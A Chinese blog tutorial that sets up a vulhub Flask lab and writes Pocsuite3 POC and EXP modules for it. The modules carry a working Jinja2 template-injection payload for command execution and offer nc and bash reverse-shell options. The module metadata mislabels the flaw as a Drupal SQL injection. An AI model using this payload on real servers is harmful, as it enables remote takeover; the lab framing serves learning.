快吃小蛋糕吧
快吃小蛋糕吧

Python安全攻防-3渗透测试框架

最近新买了一本关于Python的一本书《Python安全攻防渗透测试实战指南》,这本书出自MS08067安全实验室,才学到第三章,虽然书中有非常多的低级语法错误,但是总体来讲还是值得一学的。
收回我上面说的话,这本书就是垃圾,各种语法错误,官方给的源码连最基本的功能都实现不了!!!!!

Pocsuite框架:

这里书中有对Pocsuite框架有基本的介绍,这里就不重复了,只需要知道这是一款基于漏洞与POC的远程漏洞验证框架即可。

安装:

通过git克隆代码仓库

git clone https://github.com/knownsec/pocsuite3.git

克隆完成后,仓库结构大概是这样的

root@ubuntu:~# tree
.
└── pocsuite3
    ├── CHANGELOG.md
    ├── CONTRIBUTORS.md
    ├── COPYING
    ├── docs
    │   ├── CODING.md
    │   └── USAGE.md
    ├── make.bat
    ├── makefile
    ├── MANIFEST.in
    ├── pocsuite3
    │   ├── api
    │   │   └── __init__.py
    │   ├── cli.py
    │   ├── console.py
    │   ├── data
    │   │   ├── cacert.pem
    │   │   ├── password-top100.txt
    │   │   └── user-agents.txt
    │   ├── __init__.py
    │   ├── lib
    │   │   ├── controller
    │   │   │   ├── controller.py
    │   │   │   └── __init__.py
    │   │   ├── core
    │   │   │   ├── clear.py
    │   │   │   ├── common.py
    │   │   │   ├── convert.py
    │   │   │   ├── data.py
    │   │   │   ├── datatype.py
    │   │   │   ├── decorators.py
    │   │   │   ├── enums.py
    │   │   │   ├── exception.py
    │   │   │   ├── __init__.py
    │   │   │   ├── interpreter_option.py
    │   │   │   ├── interpreter.py
    │   │   │   ├── log.py
    │   │   │   ├── optiondict.py
    │   │   │   ├── option.py
    │   │   │   ├── plugin.py
    │   │   │   ├── poc.py
    │   │   │   ├── readlineng.py
    │   │   │   ├── register.py
    │   │   │   ├── revision.py
    │   │   │   ├── settings.py
    │   │   │   ├── shell.py
    │   │   │   ├── statistics_comparison.py
    │   │   │   ├── threads.py
    │   │   │   └── update.py
    │   │   ├── helper
    │   │   │   ├── archieve
    │   │   │   │   ├── __init__.py
    │   │   │   │   ├── jar.py
    │   │   │   │   ├── memoryzip.py
    │   │   │   │   ├── war.py
    │   │   │   │   └── zip.py
    │   │   │   ├── __init__.py
    │   │   │   └── java
    │   │   │       ├── __init__.py
    │   │   │       └── serialization.py
    │   │   ├── __init__.py
    │   │   ├── parse
    │   │   │   ├── cmd.py
    │   │   │   ├── configfile.py
    │   │   │   ├── __init__.py
    │   │   │   └── url.py
    │   │   ├── request
    │   │   │   ├── __init__.py
    │   │   │   └── patch
    │   │   │       ├── add_httpraw.py
    │   │   │       ├── hook_request.py
    │   │   │       ├── hook_request_redirect.py
    │   │   │       ├── __init__.py
    │   │   │       ├── remove_ssl_verify.py
    │   │   │       └── remove_warnings.py
    │   │   └── utils
    │   │       └── __init__.py
    │   ├── modules
    │   │   ├── censys
    │   │   │   └── __init__.py
    │   │   ├── ceye
    │   │   │   └── __init__.py
    │   │   ├── fofa
    │   │   │   └── __init__.py
    │   │   ├── httpserver
    │   │   │   └── __init__.py
    │   │   ├── __init__.py
    │   │   ├── listener
    │   │   │   ├── bind_tcp.py
    │   │   │   ├── __init__.py
    │   │   │   └── reverse_tcp.py
    │   │   ├── seebug
    │   │   │   └── __init__.py
    │   │   ├── shodan
    │   │   │   └── __init__.py
    │   │   ├── spider
    │   │   │   └── __init__.py
    │   │   └── zoomeye
    │   │       └── __init__.py
    │   ├── plugins
    │   │   ├── file_record.py
    │   │   ├── html_report.py
    │   │   ├── __init__.py
    │   │   ├── poc_from_pocs.py
    │   │   ├── poc_from_redis.py
    │   │   ├── poc_from_seebug.py
    │   │   ├── target_from_censys.py
    │   │   ├── target_from_cidr.py
    │   │   ├── target_from_fofa.py
    │   │   ├── target_from_redis.py
    │   │   ├── target_from_shodan.py
    │   │   └── target_from_zoomeye.py
    │   ├── pocs
    │   │   ├── 20190404_WEB_Confluence_path_traversal.py
    │   │   ├── drupalgeddon2.py
    │   │   ├── ecshop_rce.py
    │   │   ├── ftp_burst.py
    │   │   ├── __init__.py
    │   │   ├── libssh_auth_bypass.py
    │   │   ├── node_red_unauthorized_rce.py
    │   │   ├── redis_unauthorized_access.py
    │   │   ├── ssh_burst.py
    │   │   ├── telnet_burst.py
    │   │   ├── thinkphp_rce2.py
    │   │   ├── thinkphp_rce.py
    │   │   ├── wd_nas_login_bypass_rce.py
    │   │   └── weblogic_cve_2017_10271_unserialization.py
    │   ├── shellcodes
    │   │   ├── base.py
    │   │   ├── data
    │   │   │   ├── java
    │   │   │   │   ├── reverse_tcp
    │   │   │   │   │   └── Payload.class
    │   │   │   │   └── src
    │   │   │   │       └── ReverseTCP
    │   │   │   │           └── Payload.java
    │   │   │   ├── linux
    │   │   │   │   ├── bind_tcp.bin
    │   │   │   │   ├── reverse_tcp.bin
    │   │   │   │   ├── src
    │   │   │   │   │   ├── bind_tcp.asm
    │   │   │   │   │   └── reverse_tcp.asm
    │   │   │   │   └── x64
    │   │   │   │       ├── bind_tcp.bin
    │   │   │   │       ├── reverse_tcp.bin
    │   │   │   │       └── src
    │   │   │   │           ├── bind_tcp.asm
    │   │   │   │           └── reverse_tcp.asm
    │   │   │   └── windows
    │   │   │       ├── bind_tcp.bin
    │   │   │       ├── reverse_tcp.bin
    │   │   │       ├── src
    │   │   │       │   ├── bind_tcp.asm
    │   │   │       │   └── reverse_tcp.asm
    │   │   │       └── x64
    │   │   │           ├── bind_tcp.bin
    │   │   │           ├── reverse_tcp.bin
    │   │   │           └── src
    │   │   │               ├── bind_tcp.asm
    │   │   │               └── reverse_tcp.asm
    │   │   ├── dotnet.py
    │   │   ├── encoder.py
    │   │   ├── generator.py
    │   │   ├── __init__.py
    │   │   ├── java.py
    │   │   ├── php.py
    │   │   ├── python.py
    │   │   └── tools
    │   │       ├── ld64.exe
    │   │       ├── ld.exe
    │   │       ├── ld.gold.exe
    │   │       ├── libwinpthread-1.dll
    │   │       ├── nasm.exe
    │   │       └── objdump.exe
    │   └── thirdparty
    │       ├── ansistrm
    │       │   ├── ansistrm.py
    │       │   └── __init__.py
    │       ├── colorama
    │       │   ├── ansi.py
    │       │   ├── ansitowin32.py
    │       │   ├── initialise.py
    │       │   ├── __init__.py
    │       │   ├── win32.py
    │       │   └── winterm.py
    │       ├── ifcfg
    │       │   └── ifcfg
    │       │       ├── __init__.py
    │       │       ├── parser.py
    │       │       └── tools.py
    │       ├── markup
    │       │   ├── __init__.py
    │       │   └── markup.py
    │       ├── oset
    │       │   ├── __init__.py
    │       │   └── orderedset.py
    │       ├── prettytable
    │       │   ├── __init__.py
    │       │   └── prettytable.py
    │       ├── pysocks
    │       │   ├── __init__.py
    │       │   └── socks.py
    │       └── termcolor
    │           ├── __init__.py
    │           └── termcolor.py
    ├── pocsuite.ini
    ├── README.md
    ├── requirements.txt
    ├── setup.cfg
    ├── setup.py
    ├── test.py
    └── tests
        ├── __init__.py
        ├── login_demo.py
        ├── test_api_diy_options.py
        ├── test_api_get_poc_info.py
        ├── test_cmd_diy_options.py
        ├── test_configfile.py
        ├── test_generate_shellcode_list.py
        ├── test_httpserver.py
        ├── test_import_pocsuite_execute.py
        ├── test_osshell.py
        ├── test_request_raw.py
        ├── test_spier_crawl.py
        └── test_webshell.py

53 directories, 172 files

使用方法:

查看帮助信息:

root@ubuntu:~# cd pocsuite3/pocsuite3/
root@ubuntu:~/pocsuite3/pocsuite3# pwd
/root/pocsuite3/pocsuite3
root@ubuntu:~/pocsuite3/pocsuite3# python3 cli.py --help
Traceback (most recent call last):
  File "cli.py", line 12, in <module>
    from pocsuite3.lib.core.option import init
  File "/root/pocsuite3/pocsuite3/__init__.py", line 10, in <module>
    from .lib.core.common import set_paths
  File "/root/pocsuite3/pocsuite3/lib/core/common.py", line 19, in <module>
    import chardet
ImportError: No module named 'chardet'

当出现以上报错时安装chardet模块即可:

pip3 install chardet

具体使用方法书中已经解释的很清楚了,这里不过多的说了

POC脚本编写

在编写POC脚本之前,我们需要将靶机环境搭建起来。

靶机环境要求

Flask轻量级web应用框架:Python编写,BSD授权,WSGI工具箱采用Werkzeug,模板引擎采用Jinja2

靶机环境搭建

这里我们直接使用Docker搭建即可。

// 安装必要的软件包
sudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common
// 安装docker
curl -sSL https://get.daocloud.io/docker | sh
// 安装docker-compose
curl -L https://get.daocloud.io/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose
// 赋予执行权限
chmod +x /usr/local/bin/docker-compose

克隆靶机配置文件

// 克隆仓库
git clone https://github.com/vulhub/vulhub.git
// 切换到指定目录中
cd vulhub/flask/ssti

因为默认源速度慢到怀疑人生,这里我们使用阿里云源进入/etc/docker/daemon.json(如没有就新建

{
     
        "registry-mirrors": ["https://registry.docker-cn.com","https://nrbewqda.mirror.aliyuncs.com","https://dmmxhzvq.mirror.aliyuncs.com"]
}

重启docker生效service docker restart

启动漏洞环境:

root@ubuntu:~# docker-compose build	// 编译下载漏洞环境所需的配置
web uses an image, skipping
root@ubuntu:~# docker-compose up -d // 启动漏洞环境
Creating network "ssti_default" with the default driver
Pulling web (vulhub/flask:1.1.1)...
1.1.1: Pulling from vulhub/flask
c7b7d16361e0: Pull complete
b7a128769df1: Pull complete
1128949d0793: Pull complete
667692510b70: Pull complete
bed4ecf88e6a: Pull complete
94d1c1cbf347: Pull complete
ac097723595b: Pull complete
e7028784d190: Pull complete
16fffdb8dec4: Pull complete
20a91e71c5f1: Pull complete
Digest: sha256:20d202d35fe99818878a3f844362210a21894bfab57b8acf23dfa3ade9a87026
Status: Downloaded newer image for vulhub/flask:1.1.1
Creating ssti_web_1 ... done

使用以下命令可以看到已经运行起来了:

root@slow:~/vulhub/flask/ssti# docker-compose ps
   Name                 Command               State           Ports         
----------------------------------------------------------------------------
ssti_web_1   /bin/sh -c gunicorn -w 4 - ...   Up      0.0.0.0:8000->8000/tcp
root@slow:~/vulhub/flask/ssti# docker ps
CONTAINER ID        IMAGE                COMMAND                  CREATED             STATUS              PORTS                    NAMES
cce021a95ecf        vulhub/flask:1.1.1   "/bin/sh -c 'gunicor…"   33 seconds ago      Up 31 seconds       0.0.0.0:8000->8000/tcp   ssti_web_1

使用浏览器访问我们的网站

Python安全攻防-3渗透测试框架_第1张图片

尝试提交参数

在这里插入图片描述

测试注入:

Python安全攻防-3渗透测试框架_第2张图片

POC脚本的编写

这里对于原著删除了没有使用到的代码,并且修改了一些语法错误

# 调用pocsuite的一些API函数
from pocsuite3.api import Output, register_poc, requests, POCBase

# 继承POCBase类
class DemoPOC(POCBase):
    vulID = '1571'          # ssvid ID, 如果是提交漏洞的同时提交PoC,则写出0
    version = "1"           # 版本
    author = "seebug"       # 作者名称
    vulDate = '2014-10-16'  # 漏洞公开时间
    createDate = '2014-10-16'   #编写POC时间
    updateDate = '2014-10-16'   # 更新POC时间
    references = ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html']    #漏洞地址来源,0day不用写
    name = 'Drupal 7.x /includes/database/database.inc SQL注入漏洞POC'      # POC名称
    appPowerLink = 'https://www.drupal.org'         # 漏洞厂商的主页地址
    appName = 'Drupal'                              # 漏洞应用名称
    appVersion = '7.x'                              # 漏洞影响版本
    vulType = 'SQL Injection'                       # 漏洞类型
    desc = """
    Drupal 在处理IN语句时,展开数组时key带入SQL语句导致SQL注入,可以添加管理员,造成信息泄露
    """         # 漏洞简要描述
    samples = []        # 测试样例,使用POC测试成功的网站
    install_requires = []

    # 定义--verify参数,poc函数
    def _verify(self):
        '''verify mode'''
        result = {
     }
        path = "/?name="
        url = self.url + path
        payload = '{
     {22*22}}'

        # first req
        try:
            resq = requests.get(url + payload)
            print(resq.text)
            # 判断对象,服务器状态码,服务器页面回显是否正确
            if resq and resq.status_code == 200 and '484' in resq.text:
                result['VerifyInfo'] = {
     }
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
        except Exception as e:
            pass
        # 将服务器信息传入到该函数中
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable.')
        # 返回成功或失败消息
        return output
    
    # 定义--attack参数,attack函数
    def _attack(self):
        return self._verify()
    
# 注册poc
register_poc(DemoPOC)

上面这串代码比较简单,首先继承POCBase类并定义一些POC信息变量:

_verify()函数:检测漏洞(POC)代码块,一般最后返回主机信息,或测试成功后的信息。

_parse_output()函数:这里的作用是检测result变量是否有内容,若有则返回成功消息与输出result内容,没有则返回失败信息。

_attack()函数:攻击实(EXP)战代码块,与POC不同的是对服务器进行目的性或破坏性的行动,这里不多做介绍,下面会用到。

Python安全攻防-3渗透测试框架_第3张图片

EXP脚本编写:

在编写代码之前,我们需要了解一些python内置变量调动的知识:

  • __bases__:以元组返回一个类所直接继承的类。

  • __mor__:以元组返回继承关系链。

  • __class__:返回对象所属的类。

  • __globals__:以字典返回函数所在模块命名空间中的所有变量。

  • __subclasses__():以列表的返回类的子类。

  • __builtins__:内建函数

构建我们代码执行的脚本:

for c in ().__class__.__base__[0].__subclass__():
	if c.__name__=='_IterationGuard':
		c.__init__.__globals__['__builtins__']['eval']("__import__('os').system('whoami')")

再将其语法格式转换为Jinja2:

{% for c in [].__class__.__base__.__subclasses__() %}
 {% if c.__name__=='_IterationGuard'%}
  {
    { c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()") }}
 {% endif %}
{% endfor %}

再将其转换为URL编码:

%7b%25+for+c+in+%5b%5d.__class__.__base__.__subclasses__()+%25%7d
+%7b%25+if+c.__name__%3d%3d%27_IterationGuard%27%25%7d
++%7b%7b+c.__init__.__globals__%5b%27__builtins__%27%5d%5b%27eval%27%5d(%22__import__(%27os%27).popen(%27whoami%27).read()%22)+%7d%7d
+%7b%25+endif+%25%7d
%7b%25+endfor+%25%7d

我们可以先尝试下是否能够成功:

Python安全攻防-3渗透测试框架_第4张图片

下面就可以开始编写我们的代码了:

from pocsuite3.api import Output, register_poc, requests, POCBase, REVERSE_PAYLOAD, OptDict
from collections import OrderedDict


class DemoPOC(POCBase):
    vulID = '1571'
    version = "1"
    author = "seebug"
    vulDate = '2014-10-16'
    createDate = '2014-10-16'
    updateDate = '2014-10-16'
    references = ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html']
    name = 'Drupal 7.x /includes/database/database.inc SQL注入漏洞POC'
    appPowerLink = 'https://www.drupal.org'
    appName = 'Drupal'
    appVersion = '7.x'
    vulType = 'SQL Injection'
    desc = """
    Drupal 在处理IN语句时,展开数组时key带入SQL语句导致SQL注入,可以添加管理员,造成信息泄露
    """
    samples = []
    install_requires = []

    def _verify(self):
        """verify mode"""
        result = {
     }
        path = "/?name="
        url = self.url + path
        payload = "{
     {22*22}}"
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                result['VerifyInfo'] = {
     }
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['NAME'] = payload
        except Exception as e:
            pass
        return self.parse_output(result)
	
    # 定义其他选项参数
    def _options(self):
        # 字典排序
        o = OrderedDict()
        payload = {
     
            "nc" : REVERSE_PAYLOAD.NC,
            "bash" : REVERSE_PAYLOAD.BASH,
        }
        # 设置默认值
        o["command"] = OptDict(selected="bash", default=payload)
        return o


    def _attack(self):
        '''attack mode'''
        result = {
     }
        path = "/?name="
        url = self.url + path
        # 接受参数
        cmd = self.get_option("command")
        payload = '''%7b%25+for+c+in+%5b%5d.__class__.__base__.__subclasses__()+%25%7d
+%7b%25+if+c.__name__%3d%3d%27_IterationGuard%27%25%7d
++%7b%7b+c.__init__.__globals__%5b%27__builtins__%27%5d%5b%27eval%27%5d(%22__import__(%27os%27).popen(%27{0}%27).read()%22)+%7d%7d
+%7b%25+endif+%25%7d
%7b%25+endfor+%25%7d'''.format(cmd)
        try:
            resq = requests.get(url + payload)
            t = resq.text
            t = t.replace('\n', '').replace('\r', '')
            print(t)
            t = t.replace(' ', '')
            result['VerifyInfo'] = {
     }
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['NAME'] = t
        except Exception as e:
            pass
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("target is not vulnerable")
        return output

register_poc(DemoPOC)

这里比较简单就不做其他的注释了。

最后成功执行命令

Python安全攻防-3渗透测试框架_第5张图片

你可能感兴趣的:(web,python)

  • Linux虚拟机安装Redis lllsure Redislinux运维服务器redis
    1.前提准备安装好虚拟机,这里使用Centos7演示;安装好Xshell,Xftp,一个用来远程登录虚拟机,一个用来远程传输文件。Xshell,Xftp下载地址:家庭/学校免费-NetSarangWebsiteRedis源码包,下载地址:Indexof/releases/2.将安装包通过Xftp传到虚拟机上并解压解压指令:tar-zxvfredis-6.2.6.tar.gz3.引入gcc依赖因为R
  • chatgpt赋能python:Python处理雷达基数据:从入门到实践 lvsetongdao123 ChatGptpythonchatgpt开发语言计算机
    Python处理雷达基数据:从入门到实践随着气象技术的不断发展,雷达探测技术已成为当今天气预报和气象研究的主要手段之一。雷达基数据是气象雷达接收到的未经加工的原始数据,因其包含大量天气信息,不仅在天气预报、天气预警等方面得到了广泛应用,还被广泛地用于气象科研和大气环境研究。本文将介绍如何使用Python处理雷达基数据,解析其中的信息,获取有效的天气数据,以及分析和可视化这些数据。雷达基数据格式与处
  • 印度、马来股票K线接口与实时数据对接文档 金融数据出海 数据分析金融python3.11数据库
    概述本文档旨在为开发者提供关于如何使用StockTVAPI获取特定股票或指数的K线数据(即OHLCV数据,包括开盘价、最高价、最低价、收盘价以及成交量),以及如何通过WebSocket(WS)获取实时市场数据的详细指南。通过本文档,您将了解到如何构造请求URL,解析返回的数据,以及一些实用的应用场景示例。K线接口说明请求方法GET请求URLhttps://api.stocktv.top/stock
  • PTA天梯赛PYthon7-10 树的遍历 胡同Alley 算法数据结构python
    给定一棵二叉树的后序遍历和中序遍历,请你输出其层序遍历的序列。这里假设键值都是互不相等的正整数。输入格式:输入第一行给出一个正整数N(≤30),是二叉树中结点的个数。第二行给出其后序遍历序列。第三行给出其中序遍历序列。数字间以空格分隔。输出格式:在一行中输出该树的层序遍历的序列。数字间以1个空格分隔,行首尾不得有多余空格。输入样例:723157641234567输出样例:4163572代码长度限制
  • 列出0 racle Forms配置文件?思维导图 代码示例(java 架构) 用心去追梦 java架构开发语言
    OracleForms配置文件OracleForms应用程序的配置涉及到多个文件,这些文件用于定义运行时环境、数据库连接、安全设置等。以下是与OracleForms相关的常见配置文件:1.formsweb.cfg位置:通常位于/forms/server/formsweb.cfg或WebLogic域中的指定目录。用途:此文件包含启动Forms应用所需的各种参数和属性,如表单模块名称、数据库连接字符串
  • 机器学习之KMeans算法 知舟不叙 机器学习算法kmeans
    文章目录引言1.KMeans算法简介2.KMeans算法的数学原理3.KMeans算法的步骤3.1初始化簇中心3.2分配数据点3.3更新簇中心3.4停止条件4.KMeans算法的优缺点4.1优点4.2缺点5.KMeans算法的应用场景5.1图像分割5.2市场细分5.3文档聚类5.4异常检测6.Python实现KMeans算法7.总结引言KMeans算法是机器学习中最经典的无监督学习算法之一,广泛应
  • HTML音频、视频--课后作业实践 Heetun html5
    浅学了web一段时间,用浅显的知识做了一个小小的实践,各位大佬们多多包涵,指正。主要知识重现:标记语法:src:设置媒体文件的路径width、height:设置媒体文件的宽度、高度autostart:逻辑值,true为自动播放;false为不自动播放loop:逻辑值,true自动循环播放;false不循环播放2.CSS的内部样式表选择器1{属性1:属性值1;属性2:属性值2;......}选择器2
  • 如何创建HTML自定义元素:使用 Web Component 的最佳实践 乐闻x WebComponent学习记录前端htmlwebcomponent
    什么是WebComponent?WebComponent是一组允许开发者创建可复用、自定义HTML元素的技术。它们使得我们可以像原生HTML标签一样使用这些自定义元素,从而提升代码的模块化和复用性。WebComponent的核心技术有以下三部分:CustomElements(自定义元素):允许开发者定义自己的HTML标签。ShadowDOM(影子DOM):为元素提供封装的DOM和样式,让组件内部的
  • 创建在线工具来测量 PDF图纸 程序员
    在线处理PDF文件时,能够直接在浏览器中测量尺寸和内容可以显著提高工作效率。本指南将引导您完成使用ComPDFKit的WebSDK构建在线PDF测量工具的简单过程。先决条件首先,您需要访问我们的“WebSDK指南”页面来检查您是否满足这些要求:Node.js的最新稳定版本。与npm兼容的包管理器。应用许可证密钥如何获取30天免费许可证ComPDFKit为每个人提供30天免费许可证密钥,以测试他们的
  • Websoft9 开源软件实操平台:快速积累企业级软件技能,深入理解真实业务场景 开源创业
    引言:打破“纸上谈兵”的实训困境当前高校技术教育普遍面临一个矛盾:学生对开源工具的理论知识掌握充分,但在真实业务场景中常因环境配置复杂、工具链割裂而难以落地。例如,部署一套完整的电商系统需协调数据库、服务器、安全策略等多环节,传统虚拟机环境难以模拟企业级复杂度。Websoft9作为开源软件自动化部署工具,通过预集成200+企业级应用模板(如GitLab、Odoo、Jenkins)和全流程管理能力,
  • Python自动化运维开发系列—CICD项目 weixin_46240874
    导语都忘记是什么时候知道python的了,我是搞linux运维的,早先只是知道搞运维必须会shell,要做一些运维自动化的工作,比如实现一些定时备份数据啊、批量执行某个操作啊、写写监控脚本什么的。后来发现工作量大的时候shell开始变慢,实现某个功能使用shell感觉力不从心,听人说python能实现shell能做的一切功能,而且开发效率高,速度快,慢慢的就认识了python,多多少少看点简单的东
  • 每日实战:python爬虫之网页跳转-以某博为例 代码CC python爬虫python爬虫pandas开发语言
    一、项目背景与核心需求通过逆向分析微博热榜接口,实现实时热搜数据抓取,重点解决:话题跳转链接参数缺失问题页面数据清洗规范化处理多维度数据采集存储二、网页跳转爬虫实现原理2.1跳转链接生成逻辑原始热搜词→"雷军刚知道柯洁定了SU7Ultra"处理流程:1.添加话题标识→#雷军刚知道柯洁定了SU7Ultra#2.URL编码→%23雷军刚知道柯洁定了SU7Ultra%233.添加搜索参数→&t=31生成
  • 飞书自定义机器人消息接入指南 师小师 飞书机器人
    操作流程第一步邀请自定义机器人入群:进入你的目标群组,打开会话设置,找到群机器人,并点击添加机器人,选择自定义机器人加入群聊。为机器人输入一个合适的名字和描述,也可以为机器人设置一个合适的头像,然后点击下一步。第二部:配置webhook获取该机器人的webhook地址,格式如下:https://open.feishu.cn/open-apis/bot/v2/hook/xxxxxxxxxxxxxxx
  • 基于 Python 将 PDF 转 Markdown 并拆解为 JSON,支持自定义标题处理 drebander pythonpdfjson
    在日常工作中,我们经常需要将PDF文件转换为可编辑、可结构化的数据格式,比如Markdown和JSON。但实际操作中,自动化工具往往会出现标题识别不准确的问题,尤其是PDF转换过程中,缺乏明确的标题标识。这篇文章将教你如何使用Python将PDF转换为Markdown,并通过自定义规则精准识别标题,最终将内容按标题结构拆解为JSON,方便后续快速检索与使用。1.实现目标将PDF文件转换为Markd
  • Python 项目自动化与 CI/CD 实践:让部署和发布像开挂一样简单 全栈探索者chen pythonpython自动化ci/cd开发语言程序人生性能优化可用性测试
    Python项目自动化与CI/CD实践:让部署和发布像开挂一样简单在软件开发的世界里,自动化和持续集成/持续部署(CI/CD)是超级英雄,它们不仅让我们的工作更加高效,还能避免那些令人头疼的手动操作。它们就像开发者的最佳伙伴,随时准备打击bug,拯救开发进度。那么,今天我们就来聊聊怎么在Python项目中玩转自动化和CI/CD,让你从繁琐的手动部署中解脱出来,飞速交付高质量的代码。文章目录什么是C
  • deepseek 对于 Web 前端过去,现在,未来的看法!称未来可能不叫前端工程师... CoderBin_ 与deepseek的对话前端
    一、你对于过去的web前端有什么看法?对早期的Web前端开发(大致在2000年代至2010年代初),可以总结出以下几个关键看法:1.技术原始,但充满探索精神基础技术简单:主要依赖HTML、CSS和原生JavaScript,缺乏现代框架和工具链的支持。兼容性噩梦:不同浏览器(尤其是IE6/7)的渲染差异极大,开发者需要大量Hack代码(如条件注释、CSS滤镜)来适配。创新萌芽:AJAX(2005年)
  • web端 -- RPC - 通用方案 扁舟·TF 爬虫爬虫
    背景当一个目标站加密字段特别多,而且我们对其并不需要大规模爬取时,考虑到时间成本,我们就可以使用RPC来获取加密数据。原理:搭建一个后端服务器,然后在浏览器中hook加密函数,注册到web.js端中,最后通过client端来回调加密函数,实现rpc远程调用以上就是整个RPC获取加密数据的流程。自己封装了一个通用框架,使用时只需修改一个点就行:自定义client端的type自定义web端typecl
  • 【一起学Rust | Tauri2.0框架】基于 Rust 与 Tauri 2.0 框架实现跨平台二维码扫描应用 金枝玉叶9 程序员知识储备1程序员知识储备2程序员知识储备3rust开发语言后端
    《一起学Rust|Tauri2.0框架》是一个结合Rust语言与Tauri框架开发跨平台应用的教程。Tauri2.0是一个非常适合构建跨平台桌面应用的框架,它让开发者可以使用Web技术(如HTML、CSS、JavaScript)来创建前端,同时利用Rust编写后端逻辑,确保应用运行高效且轻量。在这个教程中,开发者可以学习如何使用Rust与Tauri2.0框架实现一个跨平台二维码扫描应用。具体步骤可
  • create-react-app创建的项目中设置webpack配置 沃野_juededa react.jswebpack前端
    create-react-app创建的项目默认使用的是react-scripts(存在于node_modules文件夹中)来处理开发服务器和构建,它内置了一些webpack相关配置。一般不会暴露出来给开发者,但是在有些情况下我们需要修改下webpack默认配置,如修改outputPath、sourcemap方案等,但由于eject是不可逆的,所以craco插件应运而生,为我们提供了更好的解决方案。
  • Python列表与元组的深度剖析 jijihusong006 程序pythonwindows开发语言
    Python列表与元组的深度剖析:从底层实现到应用场景的全方位对比一、核心差异概览Python教程https://pan.quark.cn/s/7cefe3163f45传送代资料库https://link3.cc/aa99特性列表(List)元组(Tuple)可变性可变(Mutable)不可变(Immutable)语法表示方括号[]圆括号()内存占用较大(动态数组结构)较小(静态数组结构)哈希支持
  • SAP-ABAP:SAP外网接口调用技术全景指南 爱喝水的鱼丶 VIP详情查看专栏SAP业务学习捷径SAP-ABAP开发基础详解SAPABAPERP开发运维运维HTTP接口调用
    SAP外网接口调用技术全景指南1.核心调用方式对比矩阵方法类型协议支持适用场景开发复杂度维护成本典型应用案例HTTPClientREST/HTTP通用API集成★★☆低调用第三方支付接口SOAPProxySOAP/WSDL标准化Web服务★★★中银行系统对接ODataClientODataSAP生态集成★★☆低Fiori应用数据扩展PI/PO中间件多协议转换企业级复杂集成★★★★高跨系统业务流程编
  • Python 模拟鼠标轨迹算法 a485240 鼠标轨迹计算机外设
    一.鼠标轨迹模拟简介传统的鼠标轨迹模拟依赖于简单的数学模型,如直线或曲线路径。然而,这种方法难以捕捉到人类操作的复杂性和多样性。AI大模型的出现,使得能够通过深度学习技术,学习并模拟更自然的鼠标移动行为。二.鼠标轨迹算法实现AI大模型通过学习大量的人类鼠标操作数据,能够识别和模拟出自然且具有个体差异的鼠标轨迹。以下是实现这一技术的关键步骤:数据收集:收集不同玩家在各种游戏环境中的鼠标操作数据,包括
  • 什么是Apache Avro? maozexijr apache
    什么是ApacheAvro?ApacheAvro是一个开源的数据序列化框架,主要用于高效的数据交换和存储。它由ApacheHadoop项目开发,广泛应用于大数据生态系统中(如Hadoop、Kafka等)。Avro提供了一种紧凑、快速的二进制数据格式,同时支持丰富的数据结构和模式演化。核心特性跨语言支持Avro支持多种编程语言(如Java、Python、C++、Go等),使得不同语言之间的数据交换变
  • 能否在编辑器中一键导入Word文档? 2501_90646763 umeditor粘贴wordueditor粘贴wordueditor复制wordueditor上传word图片ueditor导入wordueditor导入pdfueditor导入ppt
    要求:开源,免费,技术支持编辑器:百度ueditor前端:vue2,vue3,vue-cli,react,html5用户体验:Ctrl+V快捷键操作功能:导入Word,导入Excel,导入PPT(PowerPoint),导入PDF,复制粘贴word,导入微信公众号内容,web截屏平台:Windows,macOS,Linux,RedHat,CentOS,Ubuntu,中标麒麟,银河麒麟,统信UOS,
  • 计算机毕业设计之基于Hadoop的热点新闻分析系统的设计与实现 微信bishe69 课程设计pythondjangomysql
    近些年来,随着科技的飞速发展,互联网的普及逐渐延伸到各行各业中,给人们生活带来了十分的便利,热点新闻分析系统利用计算机网络实现信息化管理,使整个热点新闻分析的发展和服务水平有显著提升。本文拟采用PyCharm开发工具,django框架、Python语言、Hadoop大数据处理技术进行开发,后台使用MySQL数据库进行信息管理,设计开发的热点新闻分析系统。通过调研和分析,系统拥有管理员和用户两个模块
  • Python常用的库讲解(易懂版) 不辉放弃 python开发语言
    NumPy:用于科学计算的基础库,提供多维数组对象、各种派生对象和对数组执行操作的工具。importnumpyasnp#创建一个numpy数组arr=np.array([1,2,3,4,5])print(arr)Pandas:数据处理库,提供数据结构和数据分析工具,特别适合处理结构化数据。importpandasaspd#创建一个Pandas数据帧df=pd.DataFrame({'A':[1,2
  • 【一起学Rust | Tauri2.0框架】基于 Rust 与 Tauri 2.0 框架实现生物识别(指纹识别)应用 广龙宇 Tauri2应用开发一起学Rustrust开发语言后端
    前言Tauri,作为一个新兴的跨平台应用开发框架,允许开发者使用Web前端技术构建界面,并利用Rust的高性能和安全性编写后端逻辑。这种架构巧妙地结合了Web的灵活性和原生应用的性能,为开发者提供了一种构建高效、跨平台应用的全新选择。而生物识别技术,如指纹识别、面部识别等,则为应用安全提供了更高级别的保障。将生物识别技术集成到Tauri应用中,可以提升用户体验,增强应用安全性。试想一下,用户只需轻
  • Python零基础通关教程(二):列表、字典与函数详解(附生活化案例) 中意可口可乐 python开发语言windowspython列表
    一、前情回顾与学习路线第一篇重点复习:✅变量与数据类型✅条件判断✅循环结构本篇新知识地图:graphLRA[基础语法]-->B[列表]A-->C[字典]B-->D[函数进阶]C-->D二、列表(List):你的数据收纳盒1.列表是什么?现实比喻:像超市购物车,可以随时添加/取出商品代码定义:用方括号[]包裹,元素用逗号分隔#创建购物车列表cart=["苹果","牛奶","面包"]print("购物
